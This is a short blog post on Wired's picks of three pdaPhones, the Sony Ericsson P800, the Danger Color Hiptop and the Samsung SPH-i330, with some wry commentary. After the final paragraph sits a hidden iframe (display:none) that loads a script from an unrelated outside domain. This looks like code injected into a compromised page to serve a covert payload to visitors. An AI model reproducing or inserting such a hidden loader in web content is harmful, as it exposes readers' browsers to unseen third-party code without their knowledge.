Whenever someone that isn't dedicated to the pdaPhone market (or even PDAs or mobile phones alone) renders an opinion on pdaPhones, it is suspect. But, it is also still news and so we are reporting it. Wired Magazine has published an article entitled, "The Year's Best Gear So Far". In the article they identify 3 pdaPhones that they had an opinion on.
Starting with the following quote, "If any two gadgets were meant to be combined, it's the cell phone and PDA. These color smartphones add 3-G data connections for Web and email access, as well as instant messaging. Light weight and a smart interface are key. - Joseph Portera", they pick a "Splurge", "Best Buy", and "Overrated" pdaPhone. Unfortunately, they didn't tell us what they mean by "Splurge", but I'm assuming that means they liked it.
Splurge - Sony Ericsson P800 - liked it's weight, expansion, Bluetooth, battery life, and jog dial.
Best Buy - Danger Color Hiptop - liked its integrated form, keypad, and geek factor (what else would you expect from Wired?).
Overrated - Samsung SPH-i330 - they must have had problems with this one.
It's hard to draw anything serious out of this, because you don't even know what the set of pdaPhones was that they looked at. But, it is interesting that they even had a category for pdaPhones in the first place.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
